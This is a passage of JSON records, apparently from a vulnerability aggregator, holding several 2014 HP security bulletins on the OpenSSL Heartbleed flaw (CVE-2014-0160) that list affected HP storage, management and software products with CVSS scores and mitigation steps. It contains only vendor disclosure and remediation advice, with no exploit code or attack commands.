and Enterprise Library LTO-6 Tape Drives running OpenSSL.\r\nThis is the OpenSSL vulnerability known as "Heartbleed" which could be\r\nexploited remotely resulting in disclosure of information.\r\n\r\nReferences: CVE-2014-0160, SSRT101513\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP StoreEver ESL G3 Tape Libraries with MCB rev 2 OpenSSL version1.0.1f for\r\nthe following firmware versions:\r\n\r\n671H_GS00601\r\n665H_GS12501\r\n663H_GS04601\r\n\r\nHP StoreEver ESL G3 Tape Libraries with MCB rev 1 Open SSL version 1.0.1e in\r\n655H firmware versions:\r\n\r\n655H_GS10201\r\n\r\nHP StoreEver Enterprise Library LTO-6 Tape Drives: all firmware versions.\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP is actively working to address this vulnerability for the impacted\r\nfirmware versions of HP StoreEver ESL G3 Tape Library and Enterprise Library\r\nLTO-6 Tape Drives. This bulletin will be revised when the software updates\r\nare released.\r\n\r\nHP recommends the following mitigation or workaround that can reduce the\r\nlikelihood of an attacker being able to exploit the "Heartbleed"\r\nvulnerability for the HP StoreEver ESL G3 Tape Library and the StoreEver\r\nEnterprise Library LTO-6 Tape Drives:\r\n\r\nThe following configuration options that allow access to the Heartbeat\r\nfunction in the vulnerable versions of OpenSSL are not enabled by default.\r\nVerify that the following options are "disabled" using the Tape Library GUI:\r\n\r\nSecure SMI-S\r\nCVTL User\r\n\r\nNote: disabling these features blocks the vulnerable OpenSSL function in both\r\nthe ESL G3 Tape Library and the StoreEver Enterprise Library LTO-6 Tape\r\nDrives. The basic functionality of the library is not affected by these\r\nconfiguration changes and SSL access to the user interface is not blocked by\r\nthese settings.\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 22 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNW3r0ACgkQ4B86/C0qfVldywCgwtbUfxEMhVuvS81AIP12vW0H\r\nw18AoKFRVIVVjcYhdl94betQ8xPal2sU\r\n=MhNP\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2014-05-01T00:00:00", "published": "2014-05-01T00:00:00", "id": "SECURITYVULNS:DOC:30507", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30507", "title": "[security bulletin] HPSBST03000 rev.1 - HP StoreEver ESL G3 Tape Library and Enterprise Library LTO-6 Tape Drives running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04248997\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04248997\r\nVersion: 1\r\n\r\nHPSBGN03008 rev.1 - HP Software Service Manager, "HeartBleed" OpenSSL\r\nVulnerability, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-16\r\nLast Updated: 2014-04-16\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nThe Heartbleed vulnerability was detected in specific OpenSSL versions.\r\nOpenSSL is a 3rd party product that is embedded with some of HP Software\r\nproducts. This bulletin objective is to notify HP Software customers about\r\nproducts affected by the Heartbleed vulnerability.\r\n\r\nNOTE: The Heartbleed vulnerability (CVE-2014-0160) is a vulnerability found\r\nin the OpenSSL cryptographic software library. This weakness potentially\r\nallows disclosure of information that is normally protected by the SSL/TLS\r\nprotocol. The impacted products in the list below are vulnerable due to\r\nembedding OpenSSL standard release software.\r\n\r\nReferences: CVE-2014-0160 (SSRT101516)\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nService Manager, 9.32 (including all patches), 9.33 (GA,9.33 p1, 9.33-p1-rev1\r\n& 9.33.p2)\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nNOTE: OpenSSL is an external product embedded in HP products.\r\n\r\nSecurity guidelines for remediation can be downloaded from the following\r\nlink:\r\n\r\nhttp://support.openview.hp.com/selfsolve/document/KM00843525\r\n\r\nHP recommends following the Service Manager guidelines and completing the\r\nfollowing action items:\r\n\r\nRevocation of the old key pairs that were just superseded\r\nChanging potentially affected passwords\r\nInvalidating all session keys and cookies\r\n\r\nBulletin Applicability:\r\n\r\nThis bulletin applies to each OpenSSL component that is embedded within the\r\nHP products listed in the security bulletin. The bulletin does not apply to\r\nany other 3rd party application (e.g. operating system, web server, or\r\napplication server) that may be required to be installed by the customer\r\naccording instructions in the product install guide. To learn more about HP\r\nSoftware Incident Response, please visit http://www8.hp.com/us/en/software-so\r\nlutions/enterprise-software-security-center/response-center.html . Software\r\nupdates are available from HP Software Support Online at\r\nhttp://support.openview.hp.com/downloads.jsp\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 16 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNPHNsACgkQ4B86/C0qfVmMwQCgi9CnzzUd9g7tjfv9xFQ32BSs\r\nWG0AoPOEoiZs9gYLWbaBwacUhVaC5mGV\r\n=oGCq\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2014-04-20T00:00:00", "published": "2014-04-20T00:00:00", "id": "SECURITYVULNS:DOC:30473", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30473", "title": "[security bulletin] HPSBGN03008 rev.1 - HP Software Service Manager, "HeartBleed" OpenSSL Vulnerability, Remote Disclosure of Information", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04260505\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04260505\r\nVersion: 1\r\n\r\nHPSBMU03018 rev.1 - HP Software Asset Manager running OpenSSL, Remote\r\nDisclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-21\r\nLast Updated: 2014-04-21\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Software Asset\r\nmanager running OpenSSL. The Heartbleed vulnerability was detected in\r\nspecific OpenSSL versions. OpenSSL is a 3rd party product that is embedded\r\nwith some of HP Software products. This bulletin objective is to notify HP\r\nSoftware customers about products affected by the Heartbleed vulnerability.\r\n\r\nNote: The Heartbleed vulnerability (CVE-2014-0160) is a vulnerability found\r\nin the OpenSSL product cryptographic software library product. This weakness\r\npotentially allows disclosure of information protected, under normal\r\nconditions, by the SSL/TLS protocol. The impacted products appear in the list\r\nbelow are vulnerable due to embedding OpenSSL standard release software.\r\n\r\nReferences: CVE-2014-0160 (SSRT101529)\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Asset Manager 9.40 (including all patches) HP Cloud System Chargeback 9.40\r\n(including all patches)\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nNote: OpenSSL is an external product embedded in HP products.\r\n\r\nSecurity guidelines for remediation can be downloaded from the following\r\nlink:\r\n\r\nhttp://support.openview.hp.com/selfsolve/document/KM00863578\r\n\r\nHP recommends following Asset Manager guidelines including the following\r\naction items:\r\n\r\nRevocation of the old key pairs that were just superseded\r\nChanging potentially affected passwords\r\nInvalidating all session keys and cookies\r\n\r\nBulletin Applicability:\r\n\r\nThis bulletin applies to each OpenSSL component that is embedded within the\r\nHP products listed in the security bulletin. The bulletin does not apply to\r\nany other 3rd party application (e.g. operating system, web server, or\r\napplication server) that may be required to be installed by the customer\r\naccording instructions in the product install guide.\r\n\r\nTo learn more about HP Software Incident Response, please visit http://www8.h\r\np.com/us/en/software-solutions/enterprise-software-security-center/response-c\r\nenter.html .\r\n\r\nSoftware updates are available from HP Software Support Online at\r\nhttp://support.openview.hp.com/downloads.jsp\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 21 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNWbHwACgkQ4B86/C0qfVl2AgCg+g9OYkOXmavhzO8oNrQAqZEC\r\ngnkAoJ7e9mgEcg6wSdzVzykAsNISIB7E\r\n=v1pz\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2014-05-01T00:00:00", "published": "2014-05-01T00:00:00", "id": "SECURITYVULNS:DOC:30508", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30508", "title": "[security bulletin] HPSBMU03018 rev.1 - HP Software Asset Manager running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04261644\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04261644\r\nVersion: 2\r\n\r\nHPSBST03015 rev.2 - HP 3PAR OS running OpenSSL, Remote Disclosure of\r\nInformation\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-22\r\nLast Updated: 2014-04-23\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP 3PAR OS\r\nrunning OpenSSL. This is the OpenSSL vulnerability known as "Heartbleed"\r\nwhich could be exploited remotely resulting in disclosure of information.\r\n\r\nReferences: CVE-2014-0160, SSRT101526\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP 3PAR OS 3.1.2 and subsequent\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP is actively working to address this vulnerability for the impacted\r\nsoftware versions of 3PAR OS. This bulletin will be revised when the software\r\nupdates are released.\r\n\r\nUntil the software update is available, HP recommends limiting 3PAR OS\r\nManagement Tools to use only on a secure and isolated private management\r\nnetwork.\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 22 April 2014 Initial release\r\nVersion:2 (rev.2) - 23 April 2014 Added recommendation for use of 3PAR OS\r\nManagement Tools\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNYMYwACgkQ4B86/C0qfVmSXwCcDoqspliALHdporVpYpZ7t6jF\r\nOnQAn0ec0FZvxPMxM0Uk/iQ7K2kmO1DT\r\n=ORml\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2014-05-01T00:00:00", "published": "2014-05-01T00:00:00", "id": "SECURITYVULNS:DOC:30504", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30504", "title": "[security bulletin] HPSBST03015 rev.2 - HP 3PAR OS running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04236062\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04236062\r\nVersion: 1\r\n\r\nHPSBMU02994 rev.1 - HP BladeSystem c-Class Onboard Administrator (OA) running\r\nOpenSSL, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-13\r\nLast Updated: 2014-04-13\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified in HP BladeSystem\r\nc-Class Onboard Administrator (OA) running OpenSSL. This is the OpenSSL\r\nvulnerability known as "Heartbleed" which could be exploited remotely\r\nresulting in disclosure of information.\r\n\r\nReferences: CVE-2014-0160, SSRT101500\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP BladeSystem c-Class Onboard Administrator (OA) v4.11 and 4.20\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP is actively working to address this vulnerability for the impacted\r\nversions of HP Onboard Administrator (OA). This bulletin will be revised when\r\nthe software updates are released.\r\n\r\nNotes\r\n\r\nCustomers also have the option to downgrade OA firmware to any version prior\r\nto OA v4.11 if that meets the requisite Hardware/feature support for the\r\nenclosure configuration.\r\nNo action is required unless the OA is running the firmware versions\r\nexplicitly listed as vulnerable.\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 13 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNK/UsACgkQ4B86/C0qfVmEFACggs/Q1GaEsxwM9Vq17prvnMA9\r\nzwsAn08KV2HUERq6QUThuGZ4USDSSh9S\r\n=ItbO\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2014-04-20T00:00:00", "published": "2014-04-20T00:00:00", "id": "SECURITYVULNS:DOC:30475", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30475", "title": "[security bulletin] HPSBMU02994 rev.1 - HP BladeSystem c-Class Onboard Administrator (OA) running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04239375\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04239375\r\nVersion: 1\r\n\r\nHPSBMU02997 rev.1 - HP Smart Update Manager (SUM) running OpenSSL, Remote\r\nDisclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-13\r\nLast Updated: 2014-04-13\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Smart Update\r\nManager (SUM) running OpenSSL.This is the OpenSSL vulnerability known as\r\n"Heartbleed" which could be exploited remotely resulting in disclosure of\r\ninformation.\r\n\r\nReferences: CVE-2014-0160, SSRT101503\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Smart Update Manager (SUM) 6.0.0 through 6.3.0\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP is actively working to address this vulnerability for the impacted\r\nversions of HP Smart Update Manager (SUM). This bulletin will be revised when\r\nthe software updates are released.\r\n\r\nUntil the software updates are available, HP recommends limiting HP SUM usage\r\nto a secure and isolated private management network.\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 13 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names 